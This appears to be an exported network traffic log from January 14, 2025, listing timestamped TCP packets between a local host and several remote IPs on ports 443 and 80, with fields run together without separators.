                                                                          Jan 14, 2025 22:50:29.099319935 CET44349761104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.099354982 CET49761443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:29.099354982 CET49761443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:29.099361897 CET44349761104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.099381924 CET49761443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:29.099400997 CET49761443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:29.102262020 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.102304935 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.102353096 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.102518082 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.102529049 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.150178909 CET49750443192.168.2.4104.21.96.1
                                                                          Jan 14, 2025 22:50:29.191342115 CET44349750104.21.96.1192.168.2.4
                                                                          Jan 14, 2025 22:50:29.275701046 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:29.275784969 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.275862932 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:29.276115894 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:29.276138067 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.380959034 CET44349750104.21.96.1192.168.2.4
                                                                          Jan 14, 2025 22:50:29.381057978 CET44349750104.21.96.1192.168.2.4
                                                                          Jan 14, 2025 22:50:29.381158113 CET49750443192.168.2.4104.21.96.1
                                                                          Jan 14, 2025 22:50:29.383152008 CET49750443192.168.2.4104.21.96.1
                                                                          Jan 14, 2025 22:50:29.383167028 CET44349750104.21.96.1192.168.2.4
                                                                          Jan 14, 2025 22:50:29.389949083 CET49768443192.168.2.435.190.80.1
                                                                          Jan 14, 2025 22:50:29.389977932 CET4434976835.190.80.1192.168.2.4
                                                                          Jan 14, 2025 22:50:29.390032053 CET49768443192.168.2.435.190.80.1
                                                                          Jan 14, 2025 22:50:29.391329050 CET49768443192.168.2.435.190.80.1
                                                                          Jan 14, 2025 22:50:29.391344070 CET4434976835.190.80.1192.168.2.4
                                                                          Jan 14, 2025 22:50:29.472054005 CET44349764104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.472320080 CET49764443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.472337008 CET44349764104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.473465919 CET44349764104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.473767042 CET49764443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.473944902 CET44349764104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.473978043 CET49764443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.516482115 CET49764443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.516494036 CET44349764104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.582402945 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.582725048 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.582762957 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.583528042 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.583812952 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.583899975 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.583933115 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.623877048 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.623905897 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.638216019 CET44349764104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.638377905 CET44349764104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.638439894 CET49764443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.639023066 CET49764443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.639041901 CET44349764104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.732892036 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.732932091 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.732969046 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.733027935 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.733027935 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.733067989 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.733092070 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.733124971 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.733576059 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.733620882 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.733623981 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.733634949 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.733692884 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.737550974 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.743712902 CET804974550.6.174.34192.168.2.4
                                                                          Jan 14, 2025 22:50:29.743782043 CET4974580192.168.2.450.6.174.34
                                                                          Jan 14, 2025 22:50:29.766804934 CET4974580192.168.2.450.6.174.34
                                                                          Jan 14, 2025 22:50:29.771590948 CET804974550.6.174.34192.168.2.4
                                                                          Jan 14, 2025 22:50:29.781032085 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.819607019 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.819673061 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.819727898 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.819747925 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.819802999 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.819885969 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.819932938 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.819962025 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.819976091 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.819988966 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.820038080 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.820700884 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.820780039 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.820822001 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.820822001 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.820841074 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.820880890 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.820892096 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.821624041 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.821676970 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.821685076 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.821733952 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.821779013 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.821779966 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.821793079 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.821830988 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.821839094 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.854212046 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.860527039 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:29.860582113 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.861665964 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.862085104 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:29.862268925 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.862279892 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:29.862335920 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:29.862375975 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.864301920 CET4434976835.190.80.1192.168.2.4
                                                                          Jan 14, 2025 22:50:29.864499092 CET49768443192.168.2.435.190.80.1
                                                                          Jan 14, 2025 22:50:29.864521027 CET4434976835.190.80.1192.168.2.4
                                                                          Jan 14, 2025 22:50:29.865973949 CET4434976835.190.80.1192.168.2.4
                                                                          Jan 14, 2025 22:50:29.866033077 CET49768443192.168.2.435.190.80.1
                                                                          Jan 14, 2025 22:50:29.867393017 CET49768443192.168.2.435.190.80.1
                                                                          Jan 14, 2025 22:50:29.867471933 CET4434976835.190.80.1192.168.2.4
                                                                          Jan 14, 2025 22:50:29.867568016 CET49768443192.168.2.435.190.80.1
                                                                          Jan 14, 2025 22:50:29.867575884 CET4434976835.190.80.1192.168.2.4
                                                                          Jan 14, 2025 22:50:29.874422073 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.874453068 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.906127930 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:29.906383038 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.906430960 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.906435013 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.906451941 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.906487942 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.906523943 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.906795979 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.906831980 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.906831980 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.906845093 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.906888962 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.907074928 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.907610893 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.907620907 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.907664061 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.907674074 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.907687902 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.907736063 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.907742023 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.907753944 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.907782078 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.908626080 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.908685923 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.908693075 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.908705950 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.908746958 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.908762932 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.908821106 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.908828974 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.908866882 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.909491062 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.909543991 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.909555912 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.909603119 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.910348892 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.910393000 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.910413980 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.910422087 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.910442114 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.910459995 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.920833111 CET49768443192.168.2.435.190.80.1
                                                                          Jan 14, 2025 22:50:29.952668905 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.952722073 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.989598989 CET4434976835.190.80.1192.168.2.4
                                                                          Jan 14, 2025 22:50:29.989685059 CET4434976835.190.80.1192.168.2.4
                                                                          Jan 14, 2025 22:50:29.989731073 CET49768443192.168.2.435.190.80.1
                                                                          Jan 14, 2025 22:50:29.989794970 CET49768443192.168.2.435.190.80.1
                                                                          Jan 14, 2025 22:50:29.989813089 CET4434976835.190.80.1192.168.2.4
                                                                          Jan 14, 2025 22:50:29.989824057 CET49768443192.168.2.435.190.80.1
                                                                          Jan 14, 2025 22:50:29.989857912 CET49768443192.168.2.435.190.80.1
                                                                          Jan 14, 2025 22:50:29.990438938 CET49771443192.168.2.435.190.80.1
                                                                          Jan 14, 2025 22:50:29.990526915 CET4434977135.190.80.1192.168.2.4
                                                                          Jan 14, 2025 22:50:29.990606070 CET49771443192.168.2.435.190.80.1
                                                                          Jan 14, 2025 22:50:29.990788937 CET49771443192.168.2.435.190.80.1
                                                                          Jan 14, 2025 22:50:29.990828991 CET4434977135.190.80.1192.168.2.4
                                                                          Jan 14, 2025 22:50:29.993109941 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.993187904 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.993212938 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.993261099 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.993336916 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.993383884 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.993748903 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.993838072 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.993839025 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.993853092 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.993881941 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.993899107 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.993937016 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.993983984 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.993993044 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.994039059 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.994045019 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.994060993 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.994098902 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.994139910 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.994155884 CET44349765104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:29.994168043 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:29.994204998 CET49765443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:30.047400951 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.047534943 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.047633886 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.047666073 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.047730923 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.047800064 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.047817945 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.047909021 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.048001051 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.048053980 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.048068047 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.048163891 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.048217058 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.048230886 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.048366070 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.048377991 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.092818022 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.092878103 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.137794018 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.137898922 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.137989044 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.137994051 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.138067007 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.138113976 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.138176918 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.138262987 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.138298988 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.138314009 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.138402939 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.138417959 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.138509989 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.138597965 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.138662100 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.138674021 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.138720989 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.138953924 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.139043093 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.139084101 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.139147997 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.139154911 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.139209032 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.139242887 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.139250994 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.139302015 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.139727116 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.139806032 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.139847040 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.139864922 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.139870882 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.139925003 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.139931917 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.140913963 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.140964985 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.140971899 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.187391043 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.224529028 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.224725962 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.224823952 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.224917889 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.225009918 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.225012064 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.225085974 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.225127935 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.225131035 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.225176096 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.225194931 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.225224972 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.225239992 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.225317001 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.225332975 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.225466013 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.225511074 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.225526094 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.225560904 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.225563049 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.225579977 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.225596905 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.225619078 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.225740910 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.225804090 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.225816965 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.225934029 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.226433992 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.226541042 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.226568937 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.226581097 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.226639032 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.227308035 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.227395058 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.227423906 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.227484941 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.227525949 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.227586985 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.228218079 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.228307009 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.228337049 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.228404045 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.228430033 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.228498936 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.311007977 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.311131001 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.311213970 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.311213970 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.311224937 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.311278105 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.311361074 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.311362028 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.311434031 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.311450958 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.311479092 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.311523914 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.311539888 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.311578989 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.311706066 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.311772108 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.311785936 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.311885118 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.311981916 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.312055111 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.312099934 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.312161922 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.312191963 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.312272072 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.312524080 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.312594891 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.312628031 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.312690973 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.312702894 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.312799931 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.312989950 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.313066959 CET49767443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:30.313095093 CET44349767104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.333105087 CET49773443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:30.333133936 CET44349773104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.333475113 CET49773443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:30.333996058 CET49773443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:30.334012032 CET44349773104.18.94.41192.168.2.4
